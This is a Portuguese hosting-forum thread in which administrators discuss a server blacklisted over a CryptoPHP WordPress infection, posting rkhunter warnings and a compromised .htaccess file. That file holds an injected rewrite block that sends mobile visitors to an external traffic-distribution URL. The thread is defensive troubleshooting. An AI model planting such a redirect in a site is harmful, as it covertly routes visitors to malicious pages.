Clicky

Jump to content
  • Sign Up
Sign in to follow this  
opencag

conta do servidor hackeada (CMS)

Recommended Posts

Boa tarde,

 

Hoje o IP do servidor caiu na spamhaus, quando fui verificar caiu na lista de trojan.

 

Parece que um site wordpress está contaminado com ""CryptoPHP".

 

Congelei 3 contas que tinha o arquivo "social.png" que utiliza wordpress.

 

Meu medo é que o servidor foi comprometido, bom vou postar os logs do rkhunter, acredito que não foi comprometido, os resultados devem ser falso-positivo (WARNING):

 

[10:35:28]   /sbin/ifdown                                    [ Warning ]
[10:35:28] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[10:35:29]   /sbin/ifup                                      [ Warning ]
[10:35:29] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
 
 
 
[10:35:49]   /usr/bin/GET                                    [ Warning ]
[10:35:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: a /usr/bin/perl -w script text executable
 
 
[10:35:51]   /usr/bin/ldd                                    [ Warning ]
[10:35:51] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable
 
[10:35:58]   /usr/bin/whatis                                 [ Warning ]
[10:35:58] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: POSIX shell script text executable
 
[10:49:38]   Checking for hidden files and directories       [ Warning ]
[10:49:38] Warning: Hidden directory found: /dev/.mdadm
[10:49:38] Warning: Hidden directory found: /dev/.udev
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[10:49:38] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text

Share this post


Link to post
Share on other sites

Pois é, tive uma dor de cabeça tremenda com essa blacklist => http://www.spamhaus.org/xbl/

 

Ela esta listando IP's que contenham sites utilizando CryptoPHP com ou sem backdoor instalados e consequentemente bloqueios e mais bloqueios em servidores de e-mail, em especial hotmail.

 

Dois VPS de clientes estavam usando mesmo ip compartilhado no exim, tivemos que alterar tudo para usar um IP diferente.

 

O problema é que apenas um dos VPS's havia um site em wordpress com um plugin criptografado.

Share this post


Link to post
Share on other sites

Você conseguiu achar qual é o site que está infectado ?

 

Tenho 4 contas, achei uma suspeita veja só o .htaccess

 

 

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^al$
RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]
RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]
RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302]
# BEGIN W3TC Browser Cache
<IfModule mod_deflate.c>
    <IfModule mod_headers.c>
        Header append Vary User-Agent env=!dont-vary
    </IfModule>
        AddOutputFilterByType DEFLATE text/css text/x-component application/x-javascript application/javascript text/javascript text/x-js text/html text/richtext image/svg+xml text/plain text/xsd text/xsl text/xml image/x-icon applicati$
    <IfModule mod_mime.c>
        # DEFLATE by extension
        AddOutputFilter DEFLATE js css htm html xml
    </IfModule>
</IfModule>
# END W3TC Browser Cache
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
 
# END WordPress

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.




×
×
  • Create New...